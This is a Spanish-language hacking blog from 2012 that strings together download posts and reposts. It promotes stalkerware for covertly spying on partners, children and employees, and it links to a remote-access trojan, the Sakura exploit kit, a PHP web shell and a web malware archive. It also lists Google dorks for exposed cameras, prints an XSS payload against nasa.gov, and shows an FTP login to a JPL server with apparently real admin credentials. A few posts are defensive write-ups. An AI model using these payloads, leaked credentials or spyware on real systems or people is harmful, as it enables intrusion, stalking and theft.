jueves, 11 de octubre de 2012

WebCrusier-Scanner SQL

 



Plataforma:PC
Idioma:español,ingles
Formato: rar
tipo:scanner SQL
POST:YeiZeta


 





Descarga
 


 

Espiar facebooks con Social Monitor

 



Plataforma:PC
Idioma:español,ingles
Formato: rar
POST:YeiZeta


 

¿Te preocupa lo que hacen tus hijos y otros parientes en Facebook? Social Monitor es una aplicación que te vendrá de perlas. Una vez que la hayas autorizado, Social Monitor vigilará las cuentas que desees en busca de noticias, palabras clave y fotos, y permitirá descargar esta información al disco duro.

Haz clic en Add child para añadir una cuenta a controlar. En el modo normal, debes autorizar Social Monitor en tu cuenta y tener a la otra persona en tu lista de amigos; para el modo completo, que incluye control del chat de Facebook, debes autorizar Social Monitor en las cuentas de tus hijos / parientes.

¿Listo para patrullar las cuentas de tus hijos? Presiona Check y Social Monitor llevará a cabo el análisis. Para cada perfil se muestran las actualizaciones de estado, su tipo y el estado. Si apareciese contenido sospechoso o palabras prohibidas -definidas de antemano-, las filas aparecerían en color rojo.

Para ahorrar tiempo, Social Monitor es una utilidad excelente. Sin embargo, aún quedan por pulir muchos aspectos de su funcionamiento, como la presencia de falsas alarmas y el método de escaneo, muy básico.




Descarga
 


 

SpyBubble. Software Espía de Celulares.

mod_jv_headline_cache_b73ce398c39f506af761d2277d853a92_530x370_deslizador1.png (427×370)


Plataforma:PC
Idioma:español,ingles
Formato: rar
POST:YeiZeta



Call Tracking Feature
Vea los números a los que sus hijos o empleados han llamado. O los números de otras personas que han llamado al teléfono. Además, podrá ver cuantas llamadas se hicieron para cada número, a qué hora se hicieron, y cuánto duraron. Tambien, si el número está registrado bajo un nombre en la memoria del teléfono, podrá ver el nombre.


GPS Location Tracking Feature

Usted podrá rastrear la posición exacta del teléfono usando Google Maps. Descubra si su hijo realmente está en la biblioteca o si su empleado realmente está atorado en el tráfico.

Email Tracking Feature

Con la función de rastreo de e-mails, SpyBubble guardará cada mail de entrada o salida en caso de que la otra persona esté tratando de ocultarle algo por e-mail.

Photo Tracking

SpyBubble guarda todas las fotos enviadas o recibidas por el teléfono a un servidor donde podrá verlas.


VERCION PRO:



Con SpyBubble PRO, podrá escuchar las cosas que quiere saber directamente de la boca de la otra persona.

Escuche sus llamadas y entérese de lo que está sucediendo.

Deje de andar con dudas y descubra la verdad - ¡de manera sólida e incuestionable!





Imagine una situación donde su pareja está hablando con alguien - en persona.

O a su socio de negocios hacer tratos a sus espaldas como un tiburón con traje y corbata. O a su empleado pasando información vital a la competencia.

Tal vez es su hijo o hija. ¿Está su hija saliendo con ese tipo que tiene pinta de delincuente?

Con SpyBubble Pro, es como si estuviera usted ahí, para atraparlos con las manos en la masa - o para descubrir que todo está bien.

Lo importante es que no habrá más dudas... al fin podrá saber la verdad.



Descarga
 



 

martes, 9 de octubre de 2012

Cómo espiar a los teléfonos Android - Spy Phone App Esa revisión

spying-cellphone.jpg (320×240)

Es posible que se ponga en muchas situaciones donde usted tiene que irrumpir en la intimidad de su familiar como Kid o esposa sólo para asegurarse, no hay nada malo en su vida y finalmente la suya también! Wheather es una duda acerca de su hijo / hija a encontrar con un grupo equivocado de amigos o de tu novia o esposa que tiene relación o razón que sea, es posible que desee espiar a sus teléfonos.

 

Hay una increíble aplicación para Android que me gustaría compartir lo que mantiene su tensión lejos de espiar el teléfono inteligente de su esposa e hijos para asegurarse de que son felices en la vida - Spy ese teléfono.

Ese Spy Phone es una aplicación para Android que no es sólo fácil de instalar en el teléfono móvil de la víctima, sino también para acceder a sus datos personales, como - las llamadas, sms, historial web y eventos calendario.

Todo lo que tienes que hacer es instalar la aplicación espía en el teléfono móvil de sus hijos o de la esposa y aplicación comenzará a darle todos los datos de cuenta web.

¿Cómo funciona la aplicación Mobile Spy - 'Spy ese teléfono "Works?

 

Es bastante simple, permítanme explicar paso a paso.

1. Descargar e instalar la aplicación en el teléfono de las personas que desea espiar a. (Asegúrese de que se trata de un smartphone Android.



2. Usted recibirá información acerca de iniciar sesión en la interfaz web. Sólo tiene que utilizar su nombre de usuario y contraseña y usted está en su panel de control, donde se puede ver toda la información espiado.










DESCARGAR:http://tinyurl.com/bn96yh5

3. Ya puedes consultar todos los registros de llamadas con detalles sobre el tiempo, el número, duración de la llamada, etc


4. Todo el contenido SMS con los datos completos.

 

5. Web historial de búsqueda y así sucesivamente ...

 

Beneficios del uso de ese teléfono espía App

 

1. La aplicación es hevaily disfrazado y es muy imposible conseguir detectado por la víctima o por cualquier programa. No hay rastros dejados en el teléfono inteligente en absoluto.

2. App es muy estable y no cerca de la fuerza o de cualquier error que se va sospechoso debido a app. Usted puede confiar al 100% en su estabilidad.

3. Los registros se almacenan en posible. Así que usted no tiene que almacenar en algún lugar de tu PC o móvil. Usted puede tener acceso a todos los registros en cualquier momento y en cualquier lugar con la ayuda de la conexión a Internet.

4. Apoyo a la aplicación es de clase mundial, puede hacer tantas preguntas y obtener una ayuda personal del equipo de soporte y desarrollador de sí mismos. Todos los temas serán ordenados en nuestro tiempo récord y usted no tiene que preocuparse por problemas técnicos.

5. El costo es más bajo de lo posible - Puede comparar este costo con cualquier aplicación de otras aplicaciones espía móvil en el mercado ahora mismo, ellos han hecho al más bajo costo con una mejor calidad y eficiencia.

He utilizado esta aplicación personal y confía en mí no hay mejor aplicación espía móvil que se encargará de todas sus preocupaciones acerca de la esposa y los niños en una inversión tan baja.

 

Websploit Penetration

Websploit.png.jpeg (315×114)


[>]Social Engineering Works

[>]Scan,Crawler & Analysis Web

[>]Automatic Exploiter

[>]Support Network Attacks

----

[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service

[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin

[+]format infector - inject reverse & bind payload into file format

[+]phpmyadmin Scanner

[+]LFI Bypasser

[+]Apache Users Scanner

[+]Dir Bruter

[+]admin finder

[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks

[+]MITM - Man In The Middle Attack

[+]Java Applet Attack

[+]MFOD Attack Vector

[+]USB Infection Attack

[+]ARP Dos Attack

[+]Web Killer Attack

[+]Fake Update Attack

[+]Fake Access point Attack

Screenshot-5.png (320×296)

Screenshot-4.png (320×169)

Descargar:

http://sourceforge.net/projects/websploit/

Bugtraq



Sistema de Bugtraq - Distro Pentesting GNU / Linux

Bienvenido a www.bugtraq-team.com, que ofrece la distribución más amplia, una seguridad óptima, estable y automática hasta la fecha. Bugtraq es una distribución basada en el kernel 2.6.38 tiene una amplia gama de herramientas de penetración y forenses. Bugtraq puede instalar desde una unidad USB o DVD en vivo, la distribución es personalizado para el último paquete, configurar y actualizar el núcleo y el núcleo ha sido parcheado para un mejor rendimiento y para reconocer una variedad de hardware, incluidos los parches de inyección inalámbricos Pentesting otras distribuciones no no reconoce.

Algunas de las características especiales que se pueden apreciar son:

Las mejoras administrativas del sistema para una mejor gestión de los servicios.

Se amplió la gama de reconocimiento para conductores inalámbricas de inyección.

Parchear el kernel 2.6.38 de reconocer 4 gigas de RAM de 32-bit.

Herramientas perfectamente configurados, scripts de instalación automatizados y herramientas como Nessus, OpenVAS, Greenbone, Nod32, Hashcat, Avira, BitDefender, ClamAV, Avast, AVG, etc ..

Scripts únicas de Bugtraq-Team (SVN actualizaciones herramientas, borrar pistas, puertas traseras, Spyder-SQL, etc)

Estabilidad y rendimiento optimizado: Rendimiento mejorado flash y java y empezar a purgar los servicios innecesarios. Para que el usuario sólo puede utilizar los servicios que usted realmente desea.

Se ha incorporado la creación del usuario en la instalación, que se crea con todas las configuraciones del sistema.

Somos la distribución y Forense Pentesting con más herramientas integradas y un menú funcional, bien organizada, sin repetición de lo mismo para no abrumar al usuario.

Bugtraq-1 Final - 31 May 2012 from bugtraq on Vimeo.


 

Descargar:http://www.bugtraq-team.com/index.php/downloads

Insegurida​d de los teclados virtuales

Cada vez se hace mas evidente que la mayoría las páginas web, no tienen en cuenta la importancia de la protección de los datos, paginas con contenido confidenciales, como por ejemplo, los bancos, o webs de e-commerce, son objetivos de los atacantes o de la causa "hacktivista" del momento, solo veamos los siguientes escenario para hacernos una idea de lo que piensan los roles involucrados.



imagen_teclado_virtual1.gif (430×354)

Tres escenarios posibles, tenemos que considerar:

 

Del lado del usuario, nos conectamos a un banco o a una web de compras, ¿acaso podemos tener por lo menos una "pequeña tranquilidad" viendo el "candadito"?

Del lado del proveedor de ese servicio, disponemos del último antivirus, parche y cumplimos con la ISO 1.000.001 ¿damos por asentado que los usuarios estarán seguros?

Mientras Del lado del atacante, están contentos porque instalaron el ultimo keylogger, indetectable, y encima pueden saber si el usuario sale con la secretaria que trabaja en el proveedor

Posiblemente tu estés en alguno de esos roles y has pensado algo muy parecido a los escenarios planteados, te cuento que de cada 10 sitios webs que visito, y en el cual estén trabajando tanto con "HTTPS" como con teclados virtuales, noto que 7 de ellos tienen fallas que un atacante no perdonaría.

Hablemos de los teclados virtuales:

teclado2.png (298×266)

Un teclado virtual es una aplicación por lo general escrita en JavaScript que nos muestra una pagina web, y en el cual, mediante clics del mouse, podremos mandar nuestro o "clave", sin utilizar el teclado y así poder tener acceso al servicio ofrecido.

Encontramos también, teclados que no obedecen ningún orden de aparición de teclas, esto significa que no están ordenadas como los teclados originales, y también tenemos teclados virtuales de números solos, o hasta gráficos (este es muy bueno, recomendable usarlo!!!)

De antemano, sabemos que es IMPORTANTE, no acceder a sitios que contengan teclados virtuales (por tanto con información sensible) desde lugares públicos, (llámese ciber, aeropuerto, hoteles, etc), dado que es más sencillo un ataque desde ahí.

Pero no siempre la seguridad de estos teclados es la mejor, algunos llegan al punto de guardar en "campos ocultos" los datos digitados sin cifrar, para luego ser enviados en métodos GET o POST, otros guardan una cookie en texto plano con esta información, sin contar con los que guardan toda la información digitada en la cache del navegador.

Existen métodos como la suplantación del teclado en la cache del navegador, que permiten a un atacante, sin modificar la pagina de la entidad bancaria o el sitio que contenga el teclado virtual, reemplazarlo con otro que además de enviar la información al sitio donde debería ir, también envía una copia de la misma a ellos y para esto solo es necesario que el usuario visite un sitio malicioso, para después acceder a la pagina legitima de la entidad.

Los atacantes casi siempre están un paso adelante, keyloggers indetectables, troyanos que graban videos, y aplicaciones que utilizamos para manejo de proxys, las cuales son de utilidad en el traslado de los paquetes hacia el destino, no se habla de un esnifeo, sino que se habla de la traslación de esos paquetes, que NO ESTAN CIFRADOS en el momento que los utilizamos en NUESTRO ORDENADOR.

La clave ingresada, sea pulsada o por teclado virtual, no está cifrada en su mayoría (al menos de cada 10 bancos que testee, 2 estaban cifrados), y pude capturar lo ingresado por teclado virtual, en TEXTO PLANO!!!!, en otros bancos, capture el hash que realizo el teclado virtual, pero no hay como un buen traductor (HASHONLINE).

CONCLUSION Y RECOMENDACIONES

De lado del cliente:

Utilizar software para la administración de contraseñas como LastPass.com o similares

Realizar nuestras transacciones desde equipos seguros y ojala siempre desde el mismo.

Utilizar diferentes claves SEGURAS para cada sitio (ayuda mucho usar software de administración de contraseñas)

De lado del sitio web:

CIFRA TODO, cada etapa del camino que recorre la información debe ser cifrada

Si vas a almacenar la información temporalmente en alguna parte, asegúrate que esta este cifrada y que sea borrada cuando no se necesite

Utiliza un teclado que cambie cada la posición de las teclas cada vez que el usuario entre y ojala que maneje símbolos que acordaran utilizar mutuamente con anterioridad.

No te quedes con el "OK, tengo todo controlado", piensa mejor ¿¿tengo todo controlado??

Como conclusion, no nos podemos confiar del candadito y el teclado virtual pensando que son medidas altamente seguras y que nuestra informacion estará segura con ellas, como vimos anterioremente existen muchas formas de atacar estas medidas

Top Herramientas (ISO)

Crackingislife_-_Video_guides_to_Ha.jpg (400×301)


Metasploit

NMAP

Cain & Able

Cygwin.

Wireshark

Firefox

PuTTY

the Unstoppable Copier

OllyDBG

ProcessActivityView

SniffPass Password Sniffer

ClamAV

IECookiesView

MozillaCacheView

FreeOTFE

FindSSN

The Sleuth Kit

OpenOffice

Backtrack

Ophcrack

CAINE

Tails

Ultimate Boot CD

Trinity Rescue Kit

Puppy Linux

Derik’s Boot and Nuke

Kon-Boot

Como Encontrar camaras de seguridad con Google

cams.jpg (400×325)
para buscar una camara de seguridad y tener acceso directo sin nesecidad de haber el usuario y la contraseña, tenemos que hacer lo siguiente:

nos ubicamos en google puede ser en cualquiera de tu navegador como Chrome,Explore,Firefox,TOR .

Una vez abierto el navegador con la URL de
www.google.com o tambien la de BING tenemos que utilizar cualquiera de esos codigos que vemos
abajo pero nosotros lo conocemos como "Google Hacking", Primero que todo vamos a google y escojemos cualquiera de los codigos que vemos
aca abajo, ejemplo escojemos este inurl:/view.shtml y damos en Brearch en google, luego nos saldra IP y servidores que no conocemos
por que no lo hemos abierto verdad?, bien abrimos uno de ellos y nos mostrara el panel gunto la pantalla de la camara de seguridad es
el control por lo cual en algunas las puedes mover.

código: inurl:/view.shtml

código: inurl:ViewerFrame?Mode=

código: inurl:ViewerFrame?Mode=Refresh

código: inurl:axis-cgi/jpg

código: inurl:axis-cgi/mjpg (motion-JPEG)

código: inurl:view/indexFrame.shtml (motion-JPEG)

código: inurl:view/index.shtml

código: inurl:view/view.shtml

código: intitle:axis intitle:"video server"

código: iintitle:liveapplet inurl:LvAppl

código: intitle:"EvoCam" inurl:"webcam.html"

código: intitle:"Live NetSnap Cam-Server feed"

código: intitle:"Live View / – AXIS"

código: intitle:"Live View / – AXIS 206M"

código: intitle:"Live View / – AXIS 206W"

código: intitle:"Live View / – AXIS 210″

código: inurl:indexFrame.shtml Axis

código: inurl:"MultiCameraFrame?Mode=Motion"

código: "ViewerFrame?Mode="

código: "view/index.shtml"

código: "MultiCameraFrame?Mode="

código: "axis-cgi/mjpg"

código: "Network Camera NetworkCamera"

código: axis intitle:"video server"

código: "EvoCam" inurl:"webcam.html"

código: "Live NetSnap Cam-Server feed"

código: "MultiCameraFrame?Mode=Motion"

 

 

 

 

código: "netcam live image"

código: "i-Catcher Console – Web Monitor"

código: "MOBOTIX M1 intext:Open Menucódigo: "MOBOTIX M10 intext:Open Menucódigo: "MOBOTIX D10 intext:Open Menucódigo: snc-z20 inurl:home/


lunes, 8 de octubre de 2012

Cross Site Scripting Persistente en NASA.GOV


 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website:
http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                                                                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent                |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date          : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor        : NASA
# Category      : misc
# URL Vendor    :
http://www.nasa.gov/
# Tested on     : BackTrack 5 r3 - Mozilla Firefox
# Contact       :
calebbucker@gmail.com
# Website       :
www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:

http://img341.imageshack.us/img341/4395/snapshot408.png

http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

VULNERABILITY LOCATION:

www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

CROSS SITE SCRIPTING:

www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert
('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527
CalebBucker%2527%2529%253C%252fscript%253E

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOW TO USE:

"><script>alert('XSS")</script> send it through, works on GET nothing else
is really special about it.

so double encoded it will look like this:

%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

BlackHole RAT v2




- Ejecutar comandos de la shell remotly
- Habla con esclavo
- Leer un texto sobre el ordenador esclavo
- Mostrar un mensaje
- Borrar el disco duro
- Phish la contraseña del administrador
- Bloquear el Monitor de actividad (después Pass succsessfully phishing Admin)
- Apagar, Reiniciar, Suspender e matar al Finder.app

Enlace de descarga de RAT Agujero Negro:
http://www.mediafire.com/?rv44oqvj9rl37n1

Download link a la versión Negro RATA Hoyo 2:
http://www.mediafire.com/?3nzk25p2jz8gjd1

Enlace a tutorial CryptedVirus 'para V2 Negro RAT del agujero:
http://www.youtube.com/watch?v=DIdlL6NN_oc&feature=channel_video_title


Contraseña: PassAufWasDuMachst!

Sakura Exploit Pack

logo.jpg (349×75)

http://sakura_host_on.co.cc/iniframe/e9cabf10dd[.......]
http://sakura_host_on.co.cc/?b=1
http://sakura_host_on.co.cc/forum/detect/mm.js
http://sakura_host_on.co.cc/forum/gotit.php?i=1&key=a58ba56a2d655e30366fd62f173595d0
http://sakura_host_on.co.cc/forum/New.class
http://sakura_host_on.co.cc/forum/Ini.class
http://sakura_host_on.co.cc/forum/Ini/class.class
http://sakura_host_on.co.cc/forum/New/class.class

descarga
http://sakura_host_on.co.cc/forum/spl/Expression.jar

screenshot_2271.png (1149×764)

¿Una botnet basada en JavaScript? Charla de Chema Alonso y Manu “The Sur” en RootedCON 2012

chemaAlonso-def-crop.jpg (389×200)

Hace algunos días se publicaron los videos de la Rooted CON 2012, una conferencia que se realiza todos los años en España. Estuve mirando una de las ponencias dada por Chema Alonso y Manu “The Sur”, ambos especialistas en seguridad de la empresa Informática 64.

Durante 40 minutos dan a conocer los detalles de un experimento que realizaron con una botnet basada en JavaScript.


proxy javascript botnet

Chema Alonso y Manu "The Sur" - Owning “bad” guys {and mafia} with Javascript botnets [RootedCON 2012] from rootedcon on Vimeo.

Ingeniería Social en Troyanos Bancarios – Charla de la Rooted CON 2012

rootedcon españa charla sobre troyanos
 

Comienzan con una introducción sobre ingeniería social, la base de estos ataques, para luego entrar de lleno en el funcionamiento de los troyanos. Se comentan los tipos de ataque más comunes, centrándose en una de las técnicas más utilizadas de hoy en día y difíciles de detectar por parte de las víctimas, las inyecciones HTML.

Para ilustrar la presentación realizan un par de demos con los troyanos Zeus y SpyEye, finalmente hablan del mercado underground donde se compran los kits de ataque y se mencionan soluciones para bancos y usuarios.


José Miguel Esparza y Mikel Gastesi - Social Engineering in Banking Trojans: Attacking the weakest link [Rooted CON 2012]] from rootedcon on Vimeo.

Nuevos ATM Skimmers finos que se colocan dentro de la ranura

skimmer-fino.jpg (685×250)
 

El investigador Brian Krebs publicó hace algunos días imágenes de un nuevo tipo de skimmers que son lo suficientemente finos como para ser deslizados directamente en las ranuras de los cajeros.

Recordemos que se le llama skimmer a los dispositivos utilizados para clonar tarjetas de crédito, una práctica delictiva que recibe el nombre de skimming. En el siguiente enlace puedes leer más información al respecto: ¿sabías que pueden clonar tu tarjeta al utilizar un cajero automático?

La siguientes imágenes publicadas por Brian son una cortesía del EAST (European ATM Security Team):

vulnerabilidades en terminales de pago para tarjetas de crédito

tarjeta-de-credito-300x300.jpg (300×300)

En la pasada Black Hat USA 2012, un reconocido evento de seguridad informática que se realiza en Las Vegas, los investigadores Nils y Rafael Domínguez Vega de la empresa MWR InfoSecurity, dieron a conocer una vulnerabilidad en las terminales o procesadoras de pago que permitiría ejecutar código arbitrario en sus memorias para capturar la información de las tarjetas de crédito.


VIDEO:http://vimeo.com/46465140

Realmente quieres usar tu webcam?

2ylwbyv-1c14beblu.JPG (409×432)

“Facebook hacking process completed” aunque la cuenta no existía la hackearon igual

El siguiente caso me lo envía @4v4t4r de Sec-Track.com, se trata de un servicio online que engaña a los usuarios para hacerles creer que pueden hackear Facebook y cualquier servicio de e-mail.

Todo comienza con un formulario que hay que completar con la cuenta que se desea hackear:

 

cuenta-hackear
Una vez que se completa, el super sistema de hacking secreto de la página comienza a trabajar “Facebook Hacking in Progress”, notar a continuación los códigos estilo Matrix que siempre dan un toque especial cuando se están hackeando servidores como los de Facebook (en realidad simplemente es una imagen animada .gif):




password-hackeado



 

hackeando-password

Para ver dónde terminaba todo esto ingresé datos de una cuenta inexistente utilizando una dirección de correo de esas que expiran en pocos minutos. Es decir, la cuenta de Facebook que la página estaba “hackeando” no existía, sin embargo como son super hackers la hackearon igual:


cuenta-hackeada-en-segundos

El supuesto password lo muestran encriptado lo cual seguramente tenga algún efecto psicológico en los usuarios que creen que realmente están por obtener el acceso. Ahora hay que desencriptarlo y la misma página ofrece una herramienta para ello, simplemente hay que hacer clic en el botón “Decrypt Password“:



Finalmente la cuenta -que no existía- ya fue hackeada!

Como siempre google hacking el metodo de las webcams

punta-zoom-lejos-300x243.jpg (300×243)

Hace poco comentaba que una de las búsquedas más divertidas que se pueden hacer con el denominado “Google hacking” son las de webcams abiertas o mal configuradas, pues bien en relación al tema hace algunos días visitando sitios de hoteles en Punta del Este (un balneario de mi país) descubrí que uno muy conocido le ofrece a todos los visitantes una webcam en vivo con una panorámica de la ciudad

PlaneFinder, ver aviones de todo el mundo en tiempo real sobre Google Maps

aviones-rio-de-la-plata.jpg (685×344)


Hace unos años comenté una forma de ver aviones en vivo con Google Earth, simplemente hay que descargar un pequeño archivo kmz que agrega una capa de información sobre los mapas del programa. El problema de este método es que sólo se pueden ver aviones en una zona de Europa.

Pero ahora me he encontrado con PlaneFinder, un mashup increíble que permite ver aviones de todo el mundo en vivo directamente sobre Google Maps.

En la siguiente captura se pueden ver los aviones que pasaban sobre el Río de la Plata hace algunas horas, al hacer clic sobre cualquiera de ellos pueden ver su número de vuelo, trayectoria con origen y destino, altitud, velocidad, datos técnicos del avión e incluso fotos. El servicio es realmente genial

Cracking sin secretos (PDF)

cracking+sin+secretos+Español.jpg (400×343)


Este libro muestra a los desarrolladores cómo proteger su software frente al cracking, así como las técnicas empleadas por los crackers. Sólo de ésta manera conocerá el programador el tipo de amenazas que se cienen sobre sus aplicaciones y probarlas antes por sí mismo. Se aplica el viejo principio del arte de la guerra: "conoce a tu enemigo".

Descarga:http://depositfiles.com/files/gatabv34f

Portales de la nasa mas inseguros que nunca

2509567474_4bc051aece_z.jpg (640×480)

Algunos accesos por ftp> pueden ser inseguros ya que en algunos portales estan en modo de acceso seguro eso quiere decir que no posee ninguna contraseña la cual seria un acceso directo a una seccion de datos.


 Target: subdomain of NASA.gov                 |||_HAVE NOT BEEN DOWNLOADED SENSITIVE DATA_|||
________________________________

 
C:\Windows\System32>ftp 137.78.232.95
Connesso a 137.78.232.95.
220-
220-  ======================================================================
220-  |                     Jet Propulsion Laboratory                      |
220-  |                                                                    |
220-  |                  * * *    W A R N I N G   * * *                    |
220-  |                                                                    |
220-  |                          Property of the                           |
220-  |                      UNITED STATES GOVERNMENT                      |
220-  |                                                                    |
220-  |    This computer is funded by the United States Government and     |
220-  | operated by the California Institute of Technology in support of   |
220-  | ongoing U.S. Government programs and activities.  If you are not   |
220-  | authorized to access this system, disconnect now.  Users of this   |
220-  | system have no expectation of privacy. By continuing, you consent  |
220-  |     to your keystrokes and data content being monitored.           |
220-  ======================================================================
220-
220
Utente (137.78.232.95:(none)): ******
331 Please specify the password.
Password:
230-
230-                           Jet Propulsion Laboratory
230-                        * * *    W A R N I N G   * * *
230-                   Property of the UNITED STATES GOVERNMENT
230-        This computer is funded by the United States Government and
230-      operated by the California Institute of Technology in support of
230-      ongoing U.S. Government programs and activities.  If you are not
230-      authorized to access this system, disconnect now.  Users of this
230-      system have no expectation of privacy. By continuing, you consent
230-            to your keystrokes and data content being monitored.
230-
230 Login successful.
ftp>_

http://robotics.nasa.gov

ADMIN:
Usame:045508
Password:keller2158
________________
Usame:04heinm
Password:aceduke1

Backdoor php shell

weevely-backdoor[12].gif (387274)

Weevely es un sigilo PHP shell web que simula una conexión telnet-like. Es una herramienta indispensable para la explotación de aplicaciones web después de la prueba, y se puede utilizar como una cáscara de sigilo web puerta trasera para gestionar las cuentas de fiar web, incluso los gratuitos alojados. Actualmente se está incluido en Backtrack y la caja y otras distribuciones de Linux para pruebas de penetración.

Descargar:http://bit.ly/Tm9cNI

Web Malware Collection Descargar

www-Pirata-Spam-FDG.jpg (500×467)

Este archivo contiene malware web recuperado de honeypots y otros lugares. Incluye varias puertas traseras, bots, exploits, y mucho más. Tenga en cuenta que muchos de los archivos son puerta trasera por lo que debe tener mucho cuidado y analizarlas antes de cualquier ejecución.


Descargar:http://packetstorm.interhost.co.il/UNIX/penetration/web-malware-collection-13-06-2012.tar.gz

Defacean pagina del consejo electoral de venezuela

cne2.jpg (307×257)

  
  1. Saludos Mundo.
  2.  
  3. ESTA CUENTA DE TWITTER ES FALSA: http://twitter.com/hack521 el dueño envie un correo a hack521@hotmail.com para hacer el cambio. (no sea estúpido y regrese mi twitter).
  4.  
  5. Hoy he ingresado a la web del CNE en plenas elecciones, deje el siguiente mensaje en su web:
  6. -----------------------------------------------------------
  7. No puedo expresar el porque he hecho esto, creo que mas que todo a sido para "Callar" a tibisay lucena en decir "sistema blindado" cuando cualquiera puede ingresar a el facilmente y tomar control de sus servidores. dejo claro a todo publico que a pesar de que he roto su sistema y he ingresado a sus servidores no he modificado ni manipulado información por el hecho de que no quiero crear el caos en todo el país.
  8.  
  9. lo he hecho solo para divertirme, y comprobarle al país completo y el mundo que el sistema del cne no es 100% seguro como piensan.
  10.  
  11. ¿porque no he defaceado todo el sitio y solo coloco una noticia? creo que es menor el impacto que puedo lograr con una noticia que defaceando todo el sitio, lo cual puedo ocasionar una guerra en todo el país por semejante obra de arte. :P
  12.  
  13. ¿que me motivo hacerlo? como todo informático y hacker que soy, me molesta que personas que son tan tontos en informática hablen de "seguridad" cuando ni siquiera saben de que hablan, me a molestado el video de la señora tibisay lucena donde dice que "es una cosa absurda de que hackeen a la directora del consejo electoral" esta señora, cree que porque usa linux no la vamos a hackear nunca, por favor, déjese de pistoladas usted. (como decimos en Venezuela, "ESTAS MEANDO FUERA DE POTE PAPA").
  14.  
  15. dejo el vídeo donde habla de estas estupidez.  
  16.  
  17.  
  18. Por otro lado, dejo nuevamente en claro, no he modificado datos para evitar un caos mayor. No soy un hacker malo, mucho menos tengo alguna preferencia política "para que no hablen estupideces los chavistas y los opositores".
  19.  
  20. Simplemente soy un investigador, informático, amante de la tecnología y la seguridad informática que deja en descubierto su seguridad.
  21.  
  22. Ahora yo pregunto, ¿realmente es muy seguro? ¿realmente estamos lejos de ingresar a su ordenador?.
  23.  
  24. Dejo nuevamente claro, a pesar de que tengo acceso a sus servidores completamente, no he modificado "DATOS". simplemente quería demostrar mis conocimientos informáticos.
  25.  
  26. (deberían de contratarme a mi, son mas de 30 vulnerabilidades que tiene su sitio). y sus servidores.
  27.  
  28. Hablaría algunas cosas de las terminales que usan para las votaciones, (las cuales también he comprobado de que son vulnerables a troyanos y manipulación de datos remotamente), pero seria meterme mas a fondo y ya con esto he probado lo suficiente y lo que quería.
  29.  
  30. Que pasen un feliz día de votaciones.. :D
  31.  
  32. atentamente. HACK521
  33. -----------------------------------------------------------
  34.  
  35. info complementaria.
  36.  
  37. http://www.portalnet.cl/comunidad/politica-e-incontinencia-nacional.611/965988-hackearon-la-pagina-de-consejo-nacional-electoral-de-venezuela.html
  38.  
  39. http://www.biobiochile.cl/2012/10/07/hackean-web-del-cne-de-venezuela-para-demostrar-vulnerabilidad-del-sistema.shtml
  40.  
  41. http://www.el-nacional.com/politica/tu_decides_2012/Hackearon-pagina-CNE_0_58794207.html
  42.  
  43. http://noticiaaldia.com/2012/10/hackean-la-pagina-web-del-cne/
  44.  
  45. http://www.notizulia.net/nacionales/304-nacionales/45867-pagina-web-del-cne-luce-parcialmente-hackeada.html
  46.  
  47. http://www.europapress.es/latam/politica/noticia-venezuela-hacker-accede-web-cne-demostrar-sistema-no-invulnerable-20121007195137.html
  48.  
  49. https://www.ennoticias.net/hacker-logr-violar-el-sistema-de-votaciones-en-venezuela/
  50.  
  51. http://inagist.com/all/255012241269719040/
  52.  
  53. http://www.araucavision.com/index.php?option=com_content&view=article&id=1560:hackean-la-pagina-web-de-la-cne-de-venezuela-&catid=77:arauca
  54.  
  55. http://www.factorabsoluto.cl/hackean-web-del-cne-de-venezuela-para-demostrar-vulnerabilidad-del-sistema
  56.  
  57. http://chileven.blogspot.com/2012/10/cne-de-venezuela-hackeado-se-comprueba.html
  58.  
  59. http://istmocentroamericano.blogspot.com/2012/10/venezuela-un-hacker-accede-la-web-del.html
  60.  
  61. imagen enviada por un fan:
  62. http://www.subirimagenes.net/pictures/ca3be2d092dd2eb4a3320eec0eace185.png
  63.  
  64. http://awesomescreenshot.com/018ie2jfd
  65.  
  66. http://www.subirimagenes.net/pictures/4df2f538249fdc3346550cf408bf0944.png
  67.  
  68. http://awesomescreenshot.com/029ie4j1b
  69.  
  70. -----------------------------------------------------------
  71. Vulnerabilidades en el sitio, muchas, una principal inyectable es:
  72.  
